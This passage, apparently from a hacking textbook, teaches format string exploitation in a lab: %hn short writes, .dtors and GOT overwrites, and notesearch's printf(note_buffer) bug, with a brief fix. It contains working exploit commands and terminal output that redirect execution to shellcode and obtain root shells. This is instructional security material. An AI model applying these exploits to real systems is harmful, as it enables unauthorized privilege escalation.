reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = -65515 0xffff0015
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%x%x%x%hn
The right way to print user-controlled input:
??%x%x%x%hn
The wrong way to print user-controlled input:
??bffff3d0b7fe75fc0
[*] test_val @ 0x08049794 = 1441720 0x0015ffb8
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08")%4\$hn
The right way to print user-controlled input:
??%4$hn
The wrong way to print user-controlled input:
??
[*] test_val @ 0x08049794 = 327608 0x0004ffb8
reader@hacking:~/booksrc $
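The two-byte behavior of %hn can be seen on an ordinary variable, without any vulnerability. In the sketch below, hn_demo() and the union are illustrative names. snprintf() stores the count of characters written so far (five) through a short pointer into one half of a 32-bit word, and the other two bytes keep their old value. Which half of the word changes depends on byte order. The comments assume little-endian x86.

```c
#include <stdint.h>
#include <stdio.h>

/* A 32-bit word that can also be accessed as two shorts. */
union word {
    uint32_t whole;
    short half[2];
};

/* Sets the word to `initial`, then lets %hn store the number of characters
 * printed so far (5, for "ABCDE") into half[which]. Only two of the four
 * bytes change. On little-endian x86, half[0] is the low-order half of
 * `whole` and half[1] is the high-order half. */
uint32_t hn_demo(uint32_t initial, int which)
{
    union word w;
    char buf[16];

    w.whole = initial;
    snprintf(buf, sizeof buf, "ABCDE%hn", &w.half[which]);
    return w.whole;
}
```

On x86, hn_demo(0xffffffff, 0) returns 0xffff0005 and hn_demo(0xffffffff, 1) returns 0x0005ffff. This mirrors the two test_val results above.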
Using short writes, an entire four-byte value can be overwritten with just two %hn parameters. In the example below, the test_val variable will be overwritten once again with the address 0xbffffd72.
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xfd72 - 8
$1 = 64874
(gdb) p 0xbfff - 0xfd72
$2 = -15731
(gdb) p 0x1bfff - 0xfd72
$3 = 49805
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08\x96\x97\x04\x08")%64874x%4\$hn%49805x%5\$hn
The right way to print user-controlled input:
????%64874x%4$hn%49805x%5$hn
The wrong way to print user-controlled input:
b7fe75fc
[*] test_val @ 0x08049794 = -1073742478 0xbffffd72
reader@hacking:~/booksrc $
The preceding example used a similar wraparound method to deal with the second write of 0xbfff being less than the first write of 0xfd72. Using short writes, the order of the writes doesn't matter, so the first write can be 0xbfff and the second 0xfd72, if the two passed addresses are swapped in position. In the output below, the address 0x08049796 is written to first, and 0x08049794 is written to second.
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xfd72 - 0xbfff
$2 = 15731
(gdb) quit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x97\x04\x08\x94\x97\x04\x08")%49143x%4\$hn%15731x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%15731x%5$hn
The wrong way to print user-controlled input:
???? b7fe75fc
[*] test_val @ 0x08049794 = -1073742478 0xbffffd72
reader@hacking:~/booksrc $
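The short-write arithmetic follows the same pattern as the byte-wise case, except that the wraparound is at 0x10000 instead of 0x100. The sketch below uses hypothetical helpers, short_pad() and short_write_pads(). It assumes 8 bytes of addresses precede the spacers, as in both commands above. It also carries over a below-8 width bump as an explicit assumption.

```c
/* Width for one %Nx spacer that moves the running output count from
 * `written` to the next count whose low 16 bits equal `target`, wrapping
 * past 0x10000 when the target is smaller than the current low half. */
unsigned short_pad(unsigned written, unsigned short target)
{
    unsigned pad = (target - (written & 0xffff)) & 0xffff;  /* diff mod 0x10000 */
    if (pad < 8)            /* assumption: keep %x from exceeding its width */
        pad += 0x10000;
    return pad;
}

/* Widths for writing `value` with two %hn parameters after `written`
 * bytes of addresses. With high_first nonzero the upper half (e.g. 0xbfff)
 * is written first; otherwise the lower half is. */
void short_write_pads(unsigned value, unsigned written, int high_first,
                      unsigned pads[2])
{
    unsigned short hi = (unsigned short)(value >> 16);
    unsigned short lo = (unsigned short)(value & 0xffff);
    unsigned short first = high_first ? hi : lo;
    unsigned short second = high_first ? lo : hi;

    pads[0] = short_pad(written, first);
    pads[1] = short_pad(written + pads[0], second);
}
```

With value 0xbffffd72 and 8 bytes written, the low-half-first order gives 64874 and 49805. The high-half-first order gives 49143 and 15731. Both pairs match the two gdb sessions above.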
The ability to overwrite arbitrary memory addresses implies the ability to control the execution flow of the program. One option is to overwrite the return address in the most recent stack frame, as was done with the stack-based overflows. While this is a possible option, there are other targets that have more predictable memory addresses. The nature of stack-based overflows only allows the overwrite of the return address, but format strings provide the ability to overwrite any memory address, which creates other possibilities.
In binary programs compiled with the GNU C compiler, special table sections called .dtors and .ctors are made for destructors and constructors, respectively. Constructor functions are executed before the main() function is executed, and destructor functions are executed just before the main() function exits with an exit system call. The destructor functions and the .dtors table section are of particular interest.
A function can be declared as a destructor function by defining the destructor attribute, as seen in dtors_sample.c.
#include <stdio.h>
#include <stdlib.h>

static void cleanup(void) __attribute__ ((destructor));

int main() {
   printf("Some actions happen in the main() function..\n");
   printf("and then when main() exits, the destructor is called..\n");

   exit(0);
}

void cleanup(void) {
   printf("In the cleanup function now..\n");
}
In the preceding code sample, the cleanup() function is defined with the destructor attribute, so the function is automatically called when the main() function exits, as shown next.
reader@hacking:~/booksrc $ gcc -o dtors_sample dtors_sample.c
reader@hacking:~/booksrc $ ./dtors_sample
Some actions happen in the main() function..
and then when main() exits, the destructor is called..
In the cleanup function now..
reader@hacking:~/booksrc $
This behavior of automatically executing a function on exit is controlled by the .dtors table section of the binary. This section is an array of 32-bit addresses terminated by a NULL address. The array always begins with 0xffffffff and ends with the NULL address of 0x00000000. Between these two are the addresses of all the functions that have been declared with the destructor attribute.
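The layout just described can be modeled with an ordinary array of function pointers. The sketch below is a simplified model, not GCC's actual code. fake_dtors stands in for the .dtors section. run_fake_dtors() walks it roughly the way the exit-time destructor routine (__do_global_dtors_aux in the nm output below) is assumed to. It skips the 0xffffffff marker and calls entries until it reaches NULL. All names other than cleanup are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

typedef void (*dtor_fn)(void);

static int cleanup_calls;               /* counts how often cleanup() ran */
static void cleanup(void) { cleanup_calls++; }

/* Hand-built stand-in for a .dtors section: a 0xffffffff-style marker,
 * the destructor addresses, then a NULL terminator. */
static dtor_fn fake_dtors[] = {
    (dtor_fn)(uintptr_t)-1,             /* marker, never called */
    cleanup,
    NULL                                /* terminator */
};

/* Simplified model of the exit-time walk: start after the marker and call
 * each entry until a NULL entry is reached. Returns the number of calls. */
int run_fake_dtors(void)
{
    int called = 0;
    for (dtor_fn *p = fake_dtors + 1; *p != NULL; p++) {
        (*p)();
        called++;
    }
    return called;
}
```

Calling run_fake_dtors() once invokes cleanup() exactly once and returns 1. In this model, the first nonzero entry after the marker is called no matter what it points to. The .dtors overwrite later in this section relies on that property.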
The nm command can be used to find the address of the cleanup() function, and objdump can be used to examine the sections of the binary.
reader@hacking:~/booksrc $ nm ./dtors_sample
080495bc d _DYNAMIC
08049688 d _GLOBAL_OFFSET_TABLE_
080484e4 R _IO_stdin_used
         w _Jv_RegisterClasses
080495a8 d __CTOR_END__
080495a4 d __CTOR_LIST__
080495b4 d __DTOR_END__
080495ac d __DTOR_LIST__
080485a0 r __FRAME_END__
080495b8 d __JCR_END__
080495b8 d __JCR_LIST__
080496b0 A __bss_start
080496a4 D __data_start
08048480 t __do_global_ctors_aux
08048340 t __do_global_dtors_aux
080496a8 D __dso_handle
         w __gmon_start__
08048479 T __i686.get_pc_thunk.bx
080495a4 d __init_array_end
080495a4 d __init_array_start
08048400 T __libc_csu_fini
08048410 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
080496b0 A _edata
080496b4 A _end
080484b0 T _fini
080484e0 R _fp_hw
0804827c T _init
080482f0 T _start
08048314 t call_gmon_start
080483e8 t cleanup
080496b0 b completed.1
080496a4 W data_start
         U exit@@GLIBC_2.0
08048380 t frame_dummy
080483b4 T main
080496ac d p.0
         U printf@@GLIBC_2.0
reader@hacking:~/booksrc $
The nm command shows that the cleanup() function is located at 0x080483e8. It also reveals that the .dtors section starts at 0x080495ac with __DTOR_LIST__ and ends at 0x080495b4 with __DTOR_END__. This means that 0x080495ac should contain 0xffffffff, 0x080495b4 should contain 0x00000000, and the address between them (0x080495b0) should contain the address of the cleanup() function (0x080483e8).
The objdump command shows the actual contents of the .dtors section, although in a slightly confusing format. The first value, 80495ac, is simply the address where the .dtors section is located. After that, the raw bytes are shown rather than DWORDs, so each little-endian value appears byte-reversed: e8830408 is the address 0x080483e8. Bearing this in mind, everything appears to be correct.
reader@hacking:~/booksrc $ objdump -s -j .dtors ./dtors_sample
./dtors_sample: file format elf32-i386
Contents of section .dtors:
 80495ac ffffffff e8830408 00000000 ............
reader@hacking:~/booksrc $
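The byte reversal in the objdump output follows from x86 being little-endian: a 32-bit value is stored least significant byte first. The sketch below uses a hypothetical helper, le_bytes_as_hex(). It prints a value's bytes in the order a little-endian machine stores them. It uses shifts, so the result does not depend on the host's own byte order.

```c
#include <stdint.h>
#include <stdio.h>

/* Writes the four bytes of `value` as hex into out (8 digits plus NUL),
 * in the order a little-endian machine such as x86 stores them. */
void le_bytes_as_hex(uint32_t value, char out[9])
{
    for (int i = 0; i < 4; i++) {
        unsigned byte = (value >> (8 * i)) & 0xff;  /* i-th byte in memory */
        snprintf(out + 2 * i, 3, "%02x", byte);
    }
}
```

For the cleanup() address, le_bytes_as_hex(0x080483e8, buf) yields "e8830408", the middle word of the .dtors dump above.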
An interesting detail about the .dtors section is that it is writable. An object dump of the headers will verify this by showing that the .dtors section isn't labeled READONLY.
reader@hacking:~/booksrc $ objdump -h ./dtors_sample
./dtors_sample: file format elf32-i386
Sections:
Idx Name Size VMA LMA File off Algn
  0 .interp 00000013 08048114 08048114 00000114 2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .note.ABI-tag 00000020 08048128 08048128 00000128 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .hash 0000002c 08048148 08048148 00000148 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .dynsym 00000060 08048174 08048174 00000174 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .dynstr 00000051 080481d4 080481d4 000001d4 2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .gnu.version 0000000c 08048226 08048226 00000226 2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .gnu.version_r 00000020 08048234 08048234 00000234 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .rel.dyn 00000008 08048254 08048254 00000254 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  8 .rel.plt 00000020 0804825c 0804825c 0000025c 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  9 .init 00000017 0804827c 0804827c 0000027c 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 10 .plt 00000050 08048294 08048294 00000294 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 11 .text 000001c0 080482f0 080482f0 000002f0 2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .fini 0000001c 080484b0 080484b0 000004b0 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .rodata 000000bf 080484e0 080484e0 000004e0 2**5
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 14 .eh_frame 00000004 080485a0 080485a0 000005a0 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 15 .ctors 00000008 080495a4 080495a4 000005a4 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 16 .dtors 0000000c 080495ac 080495ac 000005ac 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 17 .jcr 00000004 080495b8 080495b8 000005b8 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dynamic 000000c8 080495bc 080495bc 000005bc 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .got 00000004 08049684 08049684 00000684 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .got.plt 0000001c 08049688 08049688 00000688 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .data 0000000c 080496a4 080496a4 000006a4 2**2
                  CONTENTS, ALLOC, LOAD, DATA
 22 .bss 00000004 080496b0 080496b0 000006b0 2**2
                  ALLOC
 23 .comment 0000012f 00000000 00000000 000006b0 2**0
                  CONTENTS, READONLY
 24 .debug_aranges 00000058 00000000 00000000 000007e0 2**3
                  CONTENTS, READONLY, DEBUGGING
 25 .debug_pubnames 00000025 00000000 00000000 00000838 2**0
                  CONTENTS, READONLY, DEBUGGING
 26 .debug_info 000001ad 00000000 00000000 0000085d 2**0
                  CONTENTS, READONLY, DEBUGGING
 27 .debug_abbrev 00000066 00000000 00000000 00000a0a 2**0
                  CONTENTS, READONLY, DEBUGGING
 28 .debug_line 0000013d 00000000 00000000 00000a70 2**0
                  CONTENTS, READONLY, DEBUGGING
 29 .debug_str 000000bb 00000000 00000000 00000bad 2**0
                  CONTENTS, READONLY, DEBUGGING
 30 .debug_ranges 00000048 00000000 00000000 00000c68 2**3
                  CONTENTS, READONLY, DEBUGGING
reader@hacking:~/booksrc $
Another interesting detail about the .dtors section is that it is included in all binaries compiled with the GNU C compiler, regardless of whether any functions were declared with the destructor attribute. This means that the vulnerable format string program, fmt_vuln.c, must have a .dtors section containing nothing. This can be inspected using nm and objdump.
reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR
08049694 d __DTOR_END__
08049690 d __DTOR_LIST__
reader@hacking:~/booksrc $ objdump -s -j .dtors ./fmt_vuln
./fmt_vuln: file format elf32-i386
Contents of section .dtors:
 8049690 ffffffff 00000000 ........
reader@hacking:~/booksrc $
As this output shows, the distance between __DTOR_LIST__ and __DTOR_END__ is only four bytes this time, which means there are no addresses between them. The object dump verifies this.
Since the .dtors section is writable, if the address after the 0xffffffff is overwritten with a memory address, the program's execution flow will be directed to that address when the program exits. This will be the address of __DTOR_LIST__ plus four, which is 0x08049694 (which also happens to be the address of __DTOR_END__ in this case).
If the program is suid root, and this address can be overwritten, it will be possible to obtain a root shell.
reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln
SHELLCODE will be at 0xbffff9ec
reader@hacking:~/booksrc $
Shellcode can be put into an environment variable, and the address can be predicted as usual. Since the names of the helper program getenvaddr.c and the vulnerable fmt_vuln.c program differ in length by two bytes, the shellcode will be located at 0xbffff9ec when fmt_vuln.c is executed. This address simply has to be written into the .dtors section at 0x08049694 using the format string vulnerability. In the output below, the short write method is used.
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9ec - 0xbfff
$2 = 14829
(gdb) quit
reader@hacking:~/booksrc $ nm ./fmt_vuln | grep DTOR
08049694 d __DTOR_END__
08049690 d __DTOR_LIST__
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x96\x96\x04\x08\x94\x96\x04\x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
????
b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3.2# whoami
root
sh-3.2#
Even though the .dtors section isn't properly terminated with a NULL address of 0x00000000, the shellcode address is still considered to be a destructor function. When the program exits, the shellcode will be called, spawning a root shell.
In addition to the buffer overflow vulnerability, the notesearch program from Chapter 0x200 also suffers from a format string vulnerability: the printf(note_buffer) call in the code listing below.
int print_notes(int fd, int uid, char *searchstring) {
int note_length;
char byte=0, note_buffer[100];
note_length = find_user_note(fd, uid);
if(note_length == -1) // If end of file reached,
return 0; // return 0.
read(fd, note_buffer, note_length); // Read note data.
note_buffer[note_length] = 0; // Terminate the string.
if(search_note(note_buffer, searchstring)) // If searchstring found,
printf(note_buffer); // print the note.
return 1;
}
This function reads the note_buffer from the file and prints the contents of the note without supplying its own format string. While this buffer can't be directly controlled from the command line, the vulnerability can be exploited by sending exactly the right data to the file using the notetaker program and then opening that note using the notesearch program. In the following output, the notetaker program is used to create notes that probe memory in the notesearch program. The probes show that the eighth format parameter is at the beginning of the buffer.
reader@hacking:~/booksrc $ ./notetaker AAAA$(perl -e 'print "%x."x10')
[DEBUG] buffer @ 0x804a008: 'AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ ./notesearch AAAA
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
AAAAbffff750.23.20435455.37303032.0.0.1.41414141.252e7825.78252e78 .
-------[ end of note data ]-------
reader@hacking:~/booksrc $ ./notetaker BBBB%8\$x
[DEBUG] buffer @ 0x804a008: 'BBBB%8$x'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ ./notesearch BBBB
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
BBBB42424242
-------[ end of note data ]-------
reader@hacking:~/booksrc $
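Decoding the hex words in the first probe shows why the eighth one marks the start of the buffer. The sketch below uses a hypothetical helper, word_to_chars(). It turns a word printed by %x back into the four bytes that a little-endian x86 stack held, lowest address first. Decoding 0x41414141 gives "AAAA". The ninth and tenth words, 0x252e7825 and 0x78252e78, decode to "%x.%" and "x.%x", which is the start of the format string itself.

```c
#include <stdint.h>

/* Rebuilds the four bytes of a word printed by %x, in little-endian
 * memory order (lowest address first), as a NUL-terminated string.
 * Nonprintable bytes are copied as-is; this sketch does not escape them. */
void word_to_chars(uint32_t word, char out[5])
{
    for (int i = 0; i < 4; i++)
        out[i] = (char)((word >> (8 * i)) & 0xff);
    out[4] = '\0';
}
```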
Now that the relative layout of memory is known, exploitation is just a matter of overwriting the .dtors section with the address of injected shellcode.
reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff9e8
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9e8 - 0xbfff
$2 = 14825
(gdb) quit
reader@hacking:~/booksrc $ nm ./notesearch | grep DTOR
08049c60 d __DTOR_END__
08049c5c d __DTOR_LIST__
reader@hacking:~/booksrc $ ./notetaker $(printf "\x62\x9c\x04\x08\x60\x9c\x04\x08")%49143x%8\$hn%14825x%9\$hn
[DEBUG] buffer @ 0x804a008: 'b?`?%49143x%8$hn%14825x%9$hn'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved.
reader@hacking:~/booksrc $ ./notesearch 49143x
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999
21
-------[ end of note data ]-------
sh-3.2# whoami
root
sh-3.2#
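The underlying bug is that print_notes() passes file data as the format string. A minimal fix, following the "right way" that fmt_vuln demonstrates, is to supply a constant format such as "%s". Any %x or %n inside the note is then printed literally. The helper format_note() below is hypothetical. It uses snprintf() only so the result can be inspected. In print_notes() itself, the equivalent change would be printf("%s", note_buffer).

```c
#include <stdio.h>

/* Copies `note` into `out` using a constant format string, so conversion
 * specifiers inside the note (%x, %n, ...) are treated as plain text
 * rather than being interpreted. Returns the length snprintf reports. */
int format_note(char *out, size_t len, const char *note)
{
    return snprintf(out, len, "%s", note);
}
```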
Since a program could use a function in a shared library many times, it's useful to have a table to reference all the functions. Another special section in compiled programs is used for this purpose—the procedure linkage table (PLT).
This section consists of many jump instructions, each one corresponding to the address of a function. It works like a springboard—each time a shared function needs to be called, control will pass through the PLT.
An object dump disassembling the PLT section in the vulnerable format string program (fmt_vuln.c) shows these jump instructions:
reader@hacking:~/booksrc $ objdump -d -j .plt ./fmt_vuln
./fmt_vuln: file format elf32-i386
Disassembly of section .plt:
080482b8 <__gmon_start__@plt-0x10>:
 80482b8: ff 35 6c 97 04 08 pushl 0x804976c
 80482be: ff 25 70 97 04 08 jmp *0x8049770
 80482c4: 00 00 add %al,(%eax)
 ...
080482c8 <__gmon_start__@plt>:
 80482c8: ff 25 74 97 04 08 jmp *0x8049774
 80482ce: 68 00 00 00 00 push $0x0
 80482d3: e9 e0 ff ff ff jmp 80482b8 <_init+0x18>
080482d8 <__libc_start_main@plt>:
 80482d8: ff 25 78 97 04 08 jmp *0x8049778
 80482de: 68 08 00 00 00 push $0x8
 80482e3: e9 d0 ff ff ff jmp 80482b8 <_init+0x18>
080482e8 <strcpy@plt>:
 80482e8: ff 25 7c 97 04 08 jmp *0x804977c
 80482ee: 68 10 00 00 00 push $0x10
 80482f3: e9 c0 ff ff ff jmp 80482b8 <_init+0x18>
080482f8 <printf@plt>:
 80482f8: ff 25 80 97 04 08 jmp *0x8049780
 80482fe: 68 18 00 00 00 push $0x18
 8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18>
08048308 <exit@plt>:
 8048308: ff 25 84 97 04 08 jmp *0x8049784
 804830e: 68 20 00 00 00 push $0x20
 8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18>
reader@hacking:~/booksrc $
One of these jump instructions is associated with the exit() function, which is called at the end of the program. If the jump instruction used for the exit() function can be manipulated to direct the execution flow into shellcode instead of the exit() function, a root shell will be spawned. Below, the procedure linkage table is shown to be read-only.
reader@hacking:~/booksrc $ objdump -h ./fmt_vuln | grep -A1 "\ .plt\ "
 10 .plt 00000060 080482b8 080482b8 000002b8 2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
But closer examination of the jump instructions reveals that they don't jump directly to addresses; they jump indirectly through pointers to addresses. For example, the actual address of the printf() function is stored as a pointer at the memory address 0x08049780, and the exit() function's address is stored at 0x08049784.
080482f8 <printf@plt>:
 80482f8: ff 25 80 97 04 08 jmp *0x8049780
 80482fe: 68 18 00 00 00 push $0x18
 8048303: e9 b0 ff ff ff jmp 80482b8 <_init+0x18>
08048308 <exit@plt>:
 8048308: ff 25 84 97 04 08 jmp *0x8049784
 804830e: 68 20 00 00 00 push $0x20
 8048313: e9 a0 ff ff ff jmp 80482b8 <_init+0x18>
These addresses exist in another section, called the global offset table (GOT), which is writable. These addresses can be obtained directly by displaying the dynamic relocation entries for the binary with objdump.
reader@hacking:~/booksrc $ objdump -R ./fmt_vuln
./fmt_vuln: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049764 R_386_GLOB_DAT __gmon_start__
08049774 R_386_JUMP_SLOT __gmon_start__
08049778 R_386_JUMP_SLOT __libc_start_main
0804977c R_386_JUMP_SLOT strcpy
08049780 R_386_JUMP_SLOT printf
08049784 R_386_JUMP_SLOT exit
reader@hacking:~/booksrc $
This reveals that the address of the exit() function is located in the GOT at 0x08049784. If the address of the shellcode is written to this location, the program should call the shellcode when it thinks it's calling the exit() function.
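The indirection that makes this work can be modeled in plain C. This toy sketch does not reproduce the real dynamic linker. got[] stands in for the writable GOT. plt_call() stands in for a read-only PLT stub such as jmp *0x8049784. patch_slot() plays the role of the format string write. All of these names are hypothetical. Because every call reads the table at run time, changing one entry redirects the next call even though the calling code never changes.

```c
/* Toy model of PLT/GOT indirection. */
typedef int (*slot_fn)(void);

static int real_exit_stub(void) { return 1; }  /* stands in for exit()        */
static int other_code(void)     { return 2; }  /* stands in for injected code */

enum { EXIT_SLOT, NSLOTS };

/* Writable table of function addresses, like the GOT. */
static slot_fn got[NSLOTS] = { real_exit_stub };

/* Fixed "stub": always jumps through the table entry, like exit@plt. */
int plt_call(int slot)
{
    return got[slot]();
}

/* Overwrites one table entry, the effect a %hn write into the GOT has. */
void patch_slot(int slot, slot_fn target)
{
    got[slot] = target;
}
```

Before patching, plt_call(EXIT_SLOT) reaches real_exit_stub(). After patch_slot(EXIT_SLOT, other_code), the same call reaches other_code().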
As usual, the shellcode is put in an environment variable, its actual location is predicted, and the format string vulnerability is used to write the value. Actually, the shellcode should still be located in the environment from before. This means the only part of the format string that needs adjustment is its first 8 bytes, which hold the two target addresses. The calculations for the %x format parameters will be done once again for clarity. In the output below, the address of the shellcode (0xbffff9ec) is written into the GOT entry for the exit() function (0x08049784).
reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./fmt_vuln
SHELLCODE will be at 0xbffff9ec
reader@hacking:~/booksrc $ gdb -q
(gdb) p 0xbfff - 8
$1 = 49143
(gdb) p 0xf9ec - 0xbfff
$2 = 14829
(gdb) quit
reader@hacking:~/booksrc $ objdump -R ./fmt_vuln
./fmt_vuln: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049764 R_386_GLOB_DAT __gmon_start__
08049774 R_386_JUMP_SLOT __gmon_start__
08049778 R_386_JUMP_SLOT __libc_start_main
0804977c R_386_JUMP_SLOT strcpy
08049780 R_386_JUMP_SLOT printf
08049784 R_386_JUMP_SLOT exit
reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x86\x97\x04\x08\x84\x97\x04\x08")%49143x%4\$hn%14829x%5\$hn
The right way to print user-controlled input:
????%49143x%4$hn%14829x%5$hn
The wrong way to print user-controlled input:
???? b7fe75fc
[*] test_val @ 0x08049794 = -72 0xffffffb8
sh-3.2# whoami
root
sh-3.2#
When fmt_vuln.c tries to call the exit() function, the address of the exit() function is looked up in the GOT and is jumped to via the PLT. Since the actual address has been switched with the address for the shellcode in the environment, a root shell is spawned.
Another advantage of overwriting the GOT is that the GOT entries are fixed per binary, so a different system with the same binary will have the same GOT entry at the same address.
The ability to overwrite any arbitrary address opens up many possibilities for exploitation. Basically, any section of memory that is writable and contains an address that directs the flow of program execution can be targeted.